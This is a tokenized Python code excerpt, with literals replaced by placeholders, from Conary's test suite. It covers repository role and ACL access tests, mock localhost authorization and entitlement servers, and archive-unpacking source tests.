) ] ) <EOL> assert ( not user2Client . hasTrove ( * compa . getNameVersionFlavor ( ) ) ) <EOL> assert ( not user2Client . hasTrove ( * pkga . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkgc . getNameVersionFlavor ( ) ) ) <EOL> def testTroveAccessMultiple ( self ) : <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . 
getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> haves = [ ] <EOL> havenots = [ ] <EOL> for x in xrange ( <NUM_LIT:5> ) : <EOL> compa = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> compb = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> compc = self . addComponent ( '<STR_LIT>' , str ( x ) ) <EOL> pkga = self . addCollection ( '<STR_LIT:a>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> pkgb = self . addCollection ( '<STR_LIT:b>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> pkgc = self . addCollection ( '<STR_LIT:c>' , str ( x ) , [ '<STR_LIT>' ] ) <EOL> grp1 = self . addCollection ( '<STR_LIT>' , str ( x ) , [ '<STR_LIT:a>' , '<STR_LIT:b>' ] ) <EOL> grp2 = self . addCollection ( '<STR_LIT>' , str ( x ) , [ '<STR_LIT:b>' , '<STR_LIT:c>' ] ) <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ grp1 . getNameVersionFlavor ( ) ] ) <EOL> haves . append ( grp1 . getNameVersionFlavor ( ) ) <EOL> haves . append ( pkga . getNameVersionFlavor ( ) ) <EOL> haves . append ( pkgb . getNameVersionFlavor ( ) ) <EOL> haves . append ( compa . getNameVersionFlavor ( ) ) <EOL> haves . append ( compb . getNameVersionFlavor ( ) ) <EOL> havenots . append ( pkgc . getNameVersionFlavor ( ) ) <EOL> havenots . append ( grp2 . getNameVersionFlavor ( ) ) <EOL> for t in haves : <EOL> assert ( userClient . hasTrove ( * t ) ) <EOL> for t in havenots : <EOL> assert ( not userClient . hasTrove ( * t ) ) <EOL> if t [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ t ] ) <EOL> for t in haves + havenots : <EOL> assert ( userClient . hasTrove ( * t ) ) <EOL> def testTroveAccessMissing ( self ) : <EOL> '''<STR_LIT>''' <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , self . cfg . buildLabel , '<STR_LIT:user>' , '<STR_LIT:user>' ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT:user>' ) <EOL> version = self . 
_cvtVersion ( '<STR_LIT:1.0>' ) <EOL> try : <EOL> repos . addTroveAccess ( '<STR_LIT:user>' , [ <EOL> ( '<STR_LIT>' , version , deps . parseFlavor ( '<STR_LIT>' ) ) ] ) <EOL> except errors . TroveMissing , e : <EOL> self . assertEqual ( e . version , version ) <EOL> else : <EOL> self . fail ( '<STR_LIT>' ) <EOL> def testUserRoleCreation ( self ) : <EOL> """<STR_LIT>""" <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( self . cfg . buildLabel , '<STR_LIT>' ) <EOL> comp = self . addComponent ( '<STR_LIT>' , '<STR_LIT:1.0>' ) <EOL> pkg = self . addCollection ( '<STR_LIT:foo>' , '<STR_LIT:1.0>' , [ '<STR_LIT>' ] ) <EOL> grp = self . addCollection ( '<STR_LIT>' , '<STR_LIT:1.0>' , [ '<STR_LIT:foo>' ] ) <EOL> repos . addUser ( self . cfg . buildLabel , "<STR_LIT:user>" , "<STR_LIT>" ) <EOL> userClient = self . getRepositoryClient ( user = '<STR_LIT:user>' , password = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> userClient . hasTrove , * comp . getNameVersionFlavor ( ) ) <EOL> repos . addRole ( self . cfg . buildLabel , "<STR_LIT:user>" ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> userClient . hasTrove , * comp . getNameVersionFlavor ( ) ) <EOL> repos . updateRoleMembers ( self . cfg . buildLabel , "<STR_LIT:user>" , [ "<STR_LIT:user>" ] ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> repos . addAcl ( self . cfg . buildLabel , "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert ( not userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> repos . addAcl ( self . cfg . 
buildLabel , "<STR_LIT:user>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> assert ( userClient . hasTrove ( * comp . getNameVersionFlavor ( ) ) ) <EOL> assert ( not userClient . hasTrove ( * pkg . getNameVersionFlavor ( ) ) ) <EOL> assert ( userClient . hasTrove ( * grp . getNameVersionFlavor ( ) ) ) <EOL> def testRoleDeletion ( self ) : <EOL> """<STR_LIT>""" <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> specialClient = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> self . assertRaises ( errors . InsufficientPermission , specialClient . getRoles , bl ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( specialClient . getRoles ( bl ) , [ "<STR_LIT>" ] ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( set ( specialClient . getRoles ( bl ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> self . assertFalse ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertFalse ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . 
setRoleCanMirror ( bl , "<STR_LIT>" , True ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . setRoleIsAdmin ( bl , "<STR_LIT>" , True ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . deleteRole ( bl , "<STR_LIT>" ) <EOL> repos . addRole ( bl , "<STR_LIT>" ) <EOL> trv = self . addComponent ( "<STR_LIT>" ) <EOL> repos . addUser ( bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . updateRoleMembers ( bl , "<STR_LIT>" , [ "<STR_LIT>" ] ) <EOL> repos . addTroveAccess ( "<STR_LIT>" , [ trv . getNameVersionFlavor ( ) ] ) <EOL> repos . deleteUserByName ( bl , "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in repos . listRoles ( bl ) ) <EOL> repos . 
deleteRole ( bl , "<STR_LIT>" ) <EOL> def testCommitCheck ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT:user>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl , write = False ) <EOL> repos . addAcl ( bl , "<STR_LIT:user>" , '<STR_LIT>' , bl , write = True ) <EOL> userRepos = self . getRepositoryClient ( user = "<STR_LIT:user>" , password = "<STR_LIT>" ) <EOL> badRepos = self . getRepositoryClient ( user = "<STR_LIT:user>" , password = "<STR_LIT>" ) <EOL> trv1 = self . addComponent ( "<STR_LIT>" , "<STR_LIT:1>" , repos = repos ) <EOL> trv2 = self . addComponent ( "<STR_LIT>" , "<STR_LIT:1>" , repos = repos ) <EOL> self . assertTrue ( repos . commitCheck ( [ trv1 . getNameVersionFlavor ( ) , trv2 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertTrue ( userRepos . commitCheck ( [ trv2 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , userRepos . commitCheck , [ trv1 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , [ trv1 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , [ trv2 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , badRepos . commitCheck , <EOL> [ trv1 . getNameVersionFlavor ( ) , trv2 . getNameVersionFlavor ( ) ] ) <EOL> self . addComponent ( "<STR_LIT>" , "<STR_LIT:2>" , repos = userRepos ) <EOL> def testCheckTroveCache ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> repos . 
addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None , write = True ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None , write = True ) <EOL> t1 = self . addComponent ( "<STR_LIT>" ) <EOL> t2 = self . addComponent ( "<STR_LIT>" ) <EOL> t3 = self . addComponent ( "<STR_LIT>" ) <EOL> self . addCollection ( "<STR_LIT:foo>" , "<STR_LIT:1>" , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> ret = repos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT:foo>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> ret = limRepos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , limRepos . commitCheck , [ t1 . getNameVersionFlavor ( ) , t2 . getNameVersionFlavor ( ) ] ) <EOL> self . assertRaises ( errors . TroveAccessError , limRepos . commitCheck , [ t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) <EOL> otherRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> ret = otherRepos . getTroveVersionList ( bl . getHost ( ) , { None : None } ) <EOL> self . assertEqual ( set ( ret . keys ( ) ) , set ( [ "<STR_LIT>" , "<STR_LIT>" ] ) ) <EOL> self . assertTrue ( otherRepos . commitCheck ( [ t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) ) <EOL> self . assertRaises ( errors . TroveAccessError , otherRepos . commitCheck , <EOL> [ t1 . getNameVersionFlavor ( ) , t2 . getNameVersionFlavor ( ) , t3 . getNameVersionFlavor ( ) ] ) <EOL> def testGetTrovesBySource ( self ) : <EOL> repos = self . openRepository ( ) <EOL> bl = self . cfg . buildLabel <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . 
addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> src = self . addComponent ( '<STR_LIT>' ) <EOL> trv = self . addCollection ( '<STR_LIT:foo>' , [ '<STR_LIT>' ] , createComps = True , sourceName = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limRepos . getTrove , * src . getNameVersionFlavor ( ) ) <EOL> lst = limRepos . getTrovesBySource ( '<STR_LIT>' , src . getVersion ( ) ) <EOL> assert ( sorted ( x [ <NUM_LIT:0> ] for x in lst ) == [ '<STR_LIT:foo>' , '<STR_LIT>' ] ) <EOL> self . addCollection ( '<STR_LIT>' , [ '<STR_LIT>' ] , createComps = True , sourceName = '<STR_LIT>' ) <EOL> self . assertRaises ( errors . InsufficientPermission , <EOL> limRepos . getTrovesBySource , '<STR_LIT>' , src . getVersion ( ) ) <EOL> lst = repos . getTrovesBySource ( '<STR_LIT>' , src . getVersion ( ) ) <EOL> assert ( sorted ( x [ <NUM_LIT:0> ] for x in lst ) == [ '<STR_LIT:foo>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def testGetTrovesByLabel ( self ) : <EOL> bl = self . cfg . buildLabel <EOL> repos = self . openRepository ( ) <EOL> repos . deleteUserByName ( bl , '<STR_LIT>' ) <EOL> self . addUserAndRole ( repos , bl , "<STR_LIT>" , "<STR_LIT>" ) <EOL> repos . addAcl ( bl , "<STR_LIT>" , '<STR_LIT>' , label = None ) <EOL> limRepos = self . getRepositoryClient ( user = "<STR_LIT>" , password = "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> self . addComponent ( "<STR_LIT>" ) <EOL> all = sorted ( str ( x ) for x in repos . getLabelsForHost ( bl . getHost ( ) ) ) <EOL> limited = sorted ( str ( x ) for x in limRepos . getLabelsForHost ( bl . 
getHost ( ) ) ) <EOL> assert ( limited == [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert ( all == [ '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> class PasswordHttpRequests ( SimpleHTTPRequestHandler ) : <EOL> valid = { ( '<STR_LIT:test>' , '<STR_LIT:foo>' ) : True , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) : True } <EOL> allowNoIp = False <EOL> def log_message ( self , * args , ** kw ) : <EOL> pass <EOL> def do_GET ( self ) : <EOL> url , args = self . path . split ( "<STR_LIT:?>" , <NUM_LIT:1> ) <EOL> if url not in ( "<STR_LIT>" , '<STR_LIT>' ) : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args = cgi . parse_qs ( args ) <EOL> if len ( args ) != <NUM_LIT:3> and not self . allowNoIp : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> elif len ( args ) == <NUM_LIT:2> : <EOL> if not '<STR_LIT:user>' in args or not '<STR_LIT:password>' in args : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args [ '<STR_LIT>' ] = [ '<STR_LIT:127.0.0.1>' ] <EOL> elif len ( args ) != <NUM_LIT:3> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if args [ '<STR_LIT>' ] [ <NUM_LIT:0> ] not in httputils . LocalHosts : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if ( args [ '<STR_LIT:user>' ] [ <NUM_LIT:0> ] , args [ '<STR_LIT:password>' ] [ <NUM_LIT:0> ] ) in self . valid : <EOL> xml = "<STR_LIT>" <EOL> else : <EOL> xml = "<STR_LIT>" <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . send_header ( "<STR_LIT>" , len ( xml ) ) <EOL> self . end_headers ( ) <EOL> self . wfile . write ( xml ) <EOL> class EntitlementRequests ( SimpleHTTPRequestHandler ) : <EOL> valid = { ( '<STR_LIT>' , '<STR_LIT>' ) : ( '<STR_LIT>' , '<STR_LIT>' , None , False ) , <EOL> ( None , '<STR_LIT>' ) : ( '<STR_LIT>' , '<STR_LIT>' , None , False ) } <EOL> def log_message ( self , * args , ** kw ) : <EOL> pass <EOL> def check ( self , entClass , entKey ) : <EOL> return self . valid . 
get ( ( entClass , entKey ) , None ) <EOL> def do_GET ( self ) : <EOL> url , args = self . path . split ( "<STR_LIT:?>" , <NUM_LIT:1> ) <EOL> if url != "<STR_LIT>" : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> args = cgi . parse_qs ( args ) <EOL> if '<STR_LIT:class>' not in args : <EOL> args [ '<STR_LIT:class>' ] = [ None ] <EOL> if len ( args ) != <NUM_LIT:4> : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> if ( args [ '<STR_LIT>' ] != [ '<STR_LIT:localhost>' ] or <EOL> args [ '<STR_LIT>' ] [ <NUM_LIT:0> ] not in httputils . LocalHosts ) : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> mappedEnt = self . check ( args [ '<STR_LIT:class>' ] [ <NUM_LIT:0> ] , args [ '<STR_LIT:key>' ] [ <NUM_LIT:0> ] ) <EOL> if mappedEnt is not None : <EOL> xml = conarycfg . emitEntitlement ( '<STR_LIT:localhost>' , * mappedEnt ) <EOL> else : <EOL> self . send_error ( <NUM_LIT> ) <EOL> return <EOL> self . send_response ( <NUM_LIT:200> ) <EOL> self . send_header ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . send_header ( "<STR_LIT>" , len ( xml ) ) <EOL> self . end_headers ( ) <EOL> self . wfile . write ( xml ) <EOL> class OneTimeEntitlementRequests ( EntitlementRequests ) : <EOL> seen = set ( ) <EOL> def check ( self , entClass , entKey ) : <EOL> if ( entClass , entKey ) in self . seen : <EOL> return None <EOL> self . seen . add ( ( entClass , entKey ) ) <EOL> return EntitlementRequests . check ( self , entClass , entKey ) <EOL> class OneTimeEntitlementRequestsInternalTimeout ( OneTimeEntitlementRequests ) : <EOL> valid = dict ( EntitlementRequests . valid ) <EOL> for key , val in valid . items ( ) : <EOL> valid [ key ] = ( val [ <NUM_LIT:0> ] , val [ <NUM_LIT:1> ] , <NUM_LIT:1> , val [ <NUM_LIT:3> ] ) <EOL> class RetryEntitlementRequests ( EntitlementRequests ) : <EOL> valid = dict ( EntitlementRequests . valid ) <EOL> for key , val in valid . 
items ( ) : <EOL> valid [ key ] = ( val [ <NUM_LIT:0> ] , val [ <NUM_LIT:1> ] ) <EOL> class AuthorizationServer : <EOL> def __init__ ( self , requestHandler ) : <EOL> self . port = testhelp . findPorts ( num = <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> self . requestHandler = requestHandler <EOL> self . start ( ) <EOL> def start ( self ) : <EOL> self . childPid = os . fork ( ) <EOL> if self . childPid > <NUM_LIT:0> : <EOL> sock_utils . tryConnect ( "<STR_LIT:127.0.0.1>" , self . port ) <EOL> return <EOL> try : <EOL> httpServer = HTTPServer ( ( '<STR_LIT>' , self . port ) , self . requestHandler ) <EOL> httpServer . serve_forever ( ) <EOL> finally : <EOL> os . _exit ( <NUM_LIT> ) <EOL> def kill ( self ) : <EOL> if self . childPid == <NUM_LIT:0> : <EOL> return <EOL> os . kill ( self . childPid , <NUM_LIT:15> ) <EOL> pid , status = os . waitpid ( self . childPid , <NUM_LIT:0> ) <EOL> if not os . WIFSIGNALED ( status ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if os . WTERMSIG ( status ) != <NUM_LIT:15> : <EOL> raise Exception ( "<STR_LIT>" % <EOL> os . WTERMSIG ( status ) ) <EOL> self . childPid = <NUM_LIT:0> <EOL> def url ( self ) : <EOL> return "<STR_LIT>" % self . port </s>
<s> from testrunner import decorators <EOL> import os <EOL> import stat <EOL> import shutil <EOL> import tempfile <EOL> from testrunner import testhelp <EOL> import SimpleHTTPServer <EOL> from conary import files , versions , rpmhelper <EOL> from conary import trove as trovemod <EOL> VFS = versions . VersionFromString <EOL> from conary . lib import log <EOL> from conary . lib import openpgpfile , util <EOL> from conary_test import rephelp <EOL> from conary . build import errors <EOL> from conary . build import lookaside <EOL> from conary . build import source <EOL> from conary_test import resources <EOL> from conary_test . cvctest . buildtest import policytest <EOL> class SourceTest ( rephelp . RepositoryHelper ) : <EOL> def testSourceManifest ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> repos = self . openRepository ( ) <EOL> for troveName , troveVersionString , troveFlavor in built : <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> troveName , versions . VersionFromString ( troveVersionString ) , troveFlavor , <EOL> withFiles = True ) : <EOL> if '<STR_LIT>' in path or '<STR_LIT>' in path : <EOL> assert ( troveName == '<STR_LIT>' ) <EOL> elif '<STR_LIT>' in path : <EOL> assert ( troveName == '<STR_LIT>' ) <EOL> def testISOArchiveJoliet ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> trove = self . build ( recipestr , "<STR_LIT>" ) <EOL> repos = self . openRepository ( ) <EOL> paths = [ ] <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> trove . getName ( ) , trove . getVersion ( ) , trove . getFlavor ( ) , <EOL> withFiles = True ) : <EOL> paths . append ( path ) <EOL> assert sorted ( paths ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def testISOArchiveRockRidge ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> trove = self . build ( recipestr , "<STR_LIT>" ) <EOL> repos = self . 
openRepository ( ) <EOL> paths = [ ] <EOL> for pathId , path , fileId , version , fileObj in repos . iterFilesInTrove ( <EOL> trove . getName ( ) , trove . getVersion ( ) , trove . getFlavor ( ) , <EOL> withFiles = True ) : <EOL> paths . append ( path ) <EOL> assert sorted ( paths ) == [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testSourceTest1 ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> self . resetWork ( ) <EOL> self . resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> origDir = os . getcwd ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT>' ) <EOL> os . chdir ( '<STR_LIT>' ) <EOL> file ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> file ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> self . writeFile ( '<STR_LIT>' , recipestr ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . addfile ( '<STR_LIT>' , text = True ) <EOL> self . addfile ( '<STR_LIT>' , text = True ) <EOL> self . commit ( ) <EOL> os . chdir ( '<STR_LIT:..>' ) <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> os . chdir ( origDir ) <EOL> self . resetCache ( ) <EOL> realExists = os . path . exists <EOL> def access_xz ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_xz ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT>' , requireCleanSources = False ) <EOL> @ decorators . requireBinary ( "<STR_LIT>" ) <EOL> def testSourceTestUnlzma ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> realExists = os . path . exists <EOL> def access_lzma ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . endswith ( '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_lzma ) <EOL> ( built , d ) = self . 
buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> assert '<STR_LIT>' in [ x [ <NUM_LIT:0> ] for x in built ] <EOL> def testSourceTestMissinglzma ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr = """<STR_LIT>""" <EOL> realExists = os . path . exists <EOL> def access_nolzma ( * args ) : <EOL> if args [ <NUM_LIT:0> ] . split ( os . sep ) [ - <NUM_LIT:1> ] in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> return False <EOL> return realExists ( * args ) <EOL> self . mock ( os . path , '<STR_LIT>' , access_nolzma ) <EOL> self . assertRaises ( RuntimeError , self . buildRecipe , recipestr , <EOL> "<STR_LIT>" ) <EOL> def testUnpackOldRpm30 ( self ) : <EOL> destdir = os . path . join ( self . workDir , '<STR_LIT>' ) <EOL> util . mkdirChain ( destdir ) <EOL> rpmfile = os . path . join ( self . cfg . sourceSearchDir , '<STR_LIT>' ) <EOL> source . _extractFilesFromRPM ( rpmfile , directory = destdir ) <EOL> self . assertTrue ( os . path . exists ( util . joinPaths ( destdir , <EOL> '<STR_LIT>' ) ) ) <EOL> def testUnpackRPMWithUnsupportedTag ( self ) : <EOL> destdir = os . path . join ( self . workDir , '<STR_LIT>' ) <EOL> util . mkdirChain ( destdir ) <EOL> rpmfile = os . path . join ( self . cfg . sourceSearchDir , <EOL> '<STR_LIT>' ) <EOL> self . mock ( source , '<STR_LIT>' , <EOL> ( <EOL> ( '<STR_LIT>' , rpmhelper . SIG_SHA1 ) , <EOL> ( '<STR_LIT>' , rpmhelper . BLINKPKGID ) , <EOL> ( '<STR_LIT>' , rpmhelper . NAME ) , <EOL> ) ) <EOL> self . assertRaises ( source . SourceError , <EOL> source . _extractFilesFromRPM , rpmfile , directory = destdir ) <EOL> def testSourcePerms ( self ) : <EOL> recipestr = """<STR_LIT>""" <EOL> self . logFilter . add ( ) <EOL> ( built , d ) = self . buildRecipe ( recipestr , "<STR_LIT>" ) <EOL> self . logFilter . remove ( ) <EOL> self . logFilter . compare ( ( <EOL> '<STR_LIT>' <EOL> ) ) <EOL> def testSourceTestSRPMCache ( self ) : <EOL> """<STR_LIT>""" <EOL> recipe1 = """<STR_LIT>""" <EOL> recipe2 = """<STR_LIT>""" <EOL> self . 
resetRepository ( ) <EOL> self . repos = self . openRepository ( ) <EOL> self . resetWork ( ) <EOL> self . resetCache ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . newpkg ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipe1 ) <EOL> self . addfile ( '<STR_LIT>' ) <EOL> self . commit ( ) <EOL> self . resetWork ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . checkout ( '<STR_LIT:foo>' ) <EOL> os . chdir ( '<STR_LIT:foo>' ) <EOL> self . writeFile ( '<STR_LIT>' , recipe2 ) <EOL> try : <EOL> self . commit ( ) <EOL> except IOError : <EOL> return <EOL> self . resetWork ( ) <EOL> self . resetCache ( ) <EOL> os . chdir ( self . workDir ) <EOL> self . cookItem ( self . repos , self . cfg , '<STR_LIT:foo>' ) <EOL> def testSourceTestSigCheck ( self ) : <EOL> """<STR_LIT>""" <EOL> recipestr1 = """<STR_LIT>""" <EOL> def mockedDownloadPublicKey ( slf ) : <EOL> if slf . keyid == '<STR_LIT>' : <EOL> f = file ( os . path . join ( resources . get_archive ( 